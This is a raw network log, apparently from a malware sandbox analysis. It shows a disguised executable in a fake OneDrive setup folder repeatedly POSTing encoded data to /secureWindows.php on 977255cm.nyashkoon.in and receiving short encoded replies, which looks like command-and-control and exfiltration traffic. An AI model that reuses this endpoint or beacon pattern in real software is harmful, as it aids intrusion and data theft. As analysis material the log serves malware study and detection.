                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ltLLRvNkx8QPxMf9OIf7M6ft8RBgIq8l2b5ODV7nuQqSjW%2F4iA3yKezeWWCb%2FmxDp0YpfWgDdqRMNwsfiKCi%2FmUlZEm43%2FZ6r8GJ0C3egZiy3ISxTR0c3KNBVaB48vaHb1%2Fa9xaA1kY%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1ba7814476c-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1888&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1382&delivery_rate=854277&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        116 | 192.168.2.4 | 50112 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:45.432094097 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:45.777308941 CET | 1076 | OUT | Data Raw: 57 57 5c 5c 50 58 56 51 58 57 50 59 55 5a 5b 59 54 5b 5c 5e 59 53 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WW\\PXVQXWPYUZ[YT[\^YSZ^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^/2?8"]'. 9&<1-<[/: Y :%'+)0^&. F$,Z*-
                                                        Oct 30, 2024 05:23:46.036936045 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:46.235941887 CET | 788 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YO0YVF2T3mHNtWVg2N8rqnkJN%2FwQKC%2FskG9Px86n11lcQn1qPsL6%2FGbMsOvGS6WB10DNMLcjHCiMZHTx1ZU2aQcsXCEQ65MYOUHRe9ymPBYapmGprbESa0uZZyOjR70c0Bh%2F2Mc9YTc%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1c06f9b2e51-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1065&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1384321&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        117 | 192.168.2.4 | 50118 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:46.272170067 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1312
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:46.622303963 CET | 1312 | OUT | Data Raw: 57 55 59 57 55 58 56 5c 58 57 50 59 55 5f 5b 5b 54 5d 5c 5c 59 5d 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WUYWUXV\XWPYU_[[T]\\Y]ZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%_/V>_+;%3=(96/%.,[-:":/]2Y(%$+)X:* F$,Z*
                                                        Oct 30, 2024 05:23:46.879302025 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:47.091000080 CET | 942 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=71K%2Fj2n6%2FHCMPqXApn1LFw9n3ggjPa0h6lDuxvfMhEx%2BnbHZNH8%2FlmxEtEwb%2By1LW0SPbA7HzS64ZaNVQXziae2pjos029ftijP5M1kFApFRj%2BKoj2rJI4JAuATq%2FLt3UmLLxhRFAq4%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1c5af83e9ca-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1414&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1622&delivery_rate=969210&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 51 28 28 30 51 25 20 2e 11 28 02 03 10 2a 58 36 15 25 22 3c 59 32 3f 3e 5b 3c 5d 23 13 3e 24 3b 03 28 32 0a 5c 34 08 23 00 3e 2b 2f 46 0c 10 24 03 24 0b 34 0b 2b 0d 0f 1f 29 38 2b 14 20 1e 29 05 29 07 3f 1d 35 23 38 10 24 1f 35 0c 2f 3d 22 1f 2e 26 21 02 2e 0d 0d 0d 3e 00 21 57 08 14 22 5c 24 3f 3f 16 31 13 2c 59 24 21 3a 58 22 2f 20 02 22 38 22 5b 28 5d 23 0f 32 20 30 10 30 1d 0e 0a 27 39 3f 04 28 32 20 0c 26 09 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&Q((0Q% .(*X6%"<Y2?>[<]#>$;(2\4#>+/F$$4+)8+ ))?5#8$5/=".&!.>!W"\$??1,Y$!:X"/ "8"[(]#2 00'9?(2 &"R. V2XS0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        118 | 192.168.2.4 | 50119 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:46.388894081 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:46.839205027 CET | 1076 | OUT | Data Raw: 52 55 59 56 50 58 53 50 58 57 50 59 55 5b 5b 59 54 59 5c 55 59 50 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RUYVPXSPXWPYU[[YTY\UYPZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%_;&_(()'>7A:%71--)$Y7*?':,<%5Z38!Y/* F$,Z*)
                                                        Oct 30, 2024 05:23:46.976316929 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:47.175275087 CET | 790 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k9zZZ5a5Lgpcr7pXCDKGE82vvHMExjBPXjnda%2BMBxIGLEdLj1XKBA2Wa2aBvTAU8uGdaN8%2B3jgIeha%2F1u1KrK1gy6hU%2FemcH4vrs9IUEa%2B7zb9awQbq74vetFAITDan3G69xrugvdx0%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1c64dd36b6a-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1034&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1359624&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        119 | 192.168.2.4 | 50122 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:47.294795036 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:47.652358055 CET | 1076 | OUT | Data Raw: 52 53 59 57 50 58 56 55 58 57 50 59 55 5e 5b 58 54 52 5c 54 59 54 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RSYWPXVUXWPYU^[XTR\TYTZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%_;.^<(=0.?-5Z$>?/:$Z 82*3_)&9_3;![. F$,Z*=
                                                        Oct 30, 2024 05:23:47.893100977 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:48.209214926 CET | 800 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ohCcu5widASgD3be9m%2Frump%2Bv%2B%2BxM4%2FAt%2FClyEm4GY%2BAjxMrtDyzmTO2o671qnHnyMf1XuurIl9h%2F0lZDXHX1NMNChUuOQeqPuasc0YF3xdodRgx%2F%2FwabuSdcxqgfKv6EphAGtGsrzM%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1cbfa5b2d39-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1312&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1163987&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        120 | 192.168.2.4 | 50123 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:48.342348099 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:48.700654030 CET | 1076 | OUT | Data Raw: 57 5e 5c 51 55 5d 56 51 58 57 50 59 55 5c 5b 52 54 5b 5c 5f 59 50 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^\QU]VQXWPYU\[RT[\_YPZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&;X<;=%><-6,&-,X/)4#7Y'94(63-Y:* F$,Z*5
                                                        Oct 30, 2024 05:23:48.933506012 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:49.145181894 CET | 786 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:49 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nej2EoRDe43A7qLZiQ0ndPmpLid6lx5e1U0F1eBumbRvhPAa0NcpuvRUmcUN659x2U%2F%2B7P6cpWxUUleBm35xtjqEYwmdZLGsyybJJcq6ZA%2FAfciMn2BsPYd9ibHfBFvJd23lQGQVLiM%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1d27b6ee98b-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1577&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1048515&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        121 | 192.168.2.4 | 50124 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:49.657191992 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:50.012635946 CET | 1076 | OUT | Data Raw: 57 54 59 55 50 59 56 55 58 57 50 59 55 5e 5b 5d 54 5c 5c 5a 59 5d 5a 58 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WTYUPYVUXWPYU^[]T\\ZY]ZX]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&;<2$=,&4^$=+-*, *&9X<653(59 F$,Z*=
                                                        Oct 30, 2024 05:23:50.241987944 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:50.456001043 CET | 783 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=15%2BxvmtzGPUbBSQlGzP19wDmnj8FR6Ftb410xDlhNultLZ1ve%2BA0I76H0UkGoFer4%2FQCA%2BDbTqEM4nXb3as5w6n5viOnc3jISgC8AZ0wuVxIWhIYxdaNoWpGJXCq8t21OVwbjkCJJ84%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1daaf8e28ab-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1086&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1341983&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:23:50.456022978 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        122 | 192.168.2.4 | 50125 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:50.594264984 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:50.949155092 CET | 1076 | OUT | Data Raw: 52 50 5c 50 55 5f 56 50 58 57 50 59 55 5e 5b 5b 54 5f 5c 5d 59 53 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RP\PU_VPXWPYU^[[T_\]YSZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^,V=?(.%>7-#&=,[/Y4\81,(:0;>/: F$,Z*=
                                                        Oct 30, 2024 05:23:51.193931103 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:51.400625944 CET | 789 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:51 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YxjPBUiM4K5j2JedILPsHC5oXfxJeLHsS8Dqjrcxeo%2BVfrU9O%2Bd4bJ4zALSZ7CaALCNP3wuZ4ry0047q%2FL7fU7f8HiSj15XGSlK7KS7RbqdtLzU%2FbvhhzmGYOtCPjcY2oo32%2BBYejvg%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1e09ccb47a3-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1794&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=834582&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        123 | 192.168.2.4 | 50126 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:51.585913897 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:51.957238913 CET | 1076 | OUT | Data Raw: 57 53 5c 50 55 5e 56 5d 58 57 50 59 55 5e 5b 5e 54 5e 5c 5a 59 54 5a 55 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WS\PU^V]XWPYU^[^T^\ZYTZU]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%- ]((]$+9\28984\ ')0(6538:: F$,Z*=


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        124 | 192.168.2.4 | 50127 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:52.121685028 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:52.480649948 CET | 1340 | OUT | Data Raw: 52 55 5c 52 55 55 56 51 58 57 50 59 55 5b 5b 5b 54 5e 5c 58 59 51 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RU\RUUVQXWPYU[[[T^\XYQZ^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%/(8)3=7@.5,^2;/9<X#71_ <%\$)^.: F$,Z*)
                                                        Oct 30, 2024 05:23:52.715445995 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:52.918895960 CET | 939 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VQPHpR5uBUdI7plxIm4dsRRLaDxN3n3i2Lvu1PO3a0pDAJNOKHsekF%2FaPZsv0hf4M7aB6O4rgc7FBVrU%2FCwqVEVOS0uZ32wX6AyREwmFuWGMLH%2FBe%2FikCajteyf5rzSLc0%2BBg8uAeow%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1ea2d154606-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1172&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=1276895&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 13 28 01 3c 1e 25 55 36 5d 2b 12 0c 01 2a 58 2a 5e 25 22 33 05 25 3c 2a 5b 3f 02 23 1d 3d 1a 20 5e 3c 0b 28 5a 21 36 2f 06 3e 2b 2f 46 0c 10 27 13 27 1c 09 54 3f 33 2d 5a 3e 01 20 01 23 20 31 01 2a 07 37 1d 35 30 34 10 26 31 03 0e 3b 3e 21 0e 2d 35 25 06 2f 33 30 1f 3d 10 21 57 08 14 22 58 32 12 23 14 26 5b 3c 5d 25 54 22 12 23 11 3f 11 23 28 31 02 2b 5d 28 1f 26 30 16 10 33 0a 28 0d 31 00 30 18 3e 21 01 55 31 23 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&(<%U6]+*X*^%"3%<*[?#= ^<(Z!6/>+/F''T?3-Z> # 1*7504&1;>!-5%/30=!W"X2#&[<]%T"#?#(1+](&03(10>!U1#"R. V2XS0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        125 | 192.168.2.4 | 50128 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:52.348104000 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
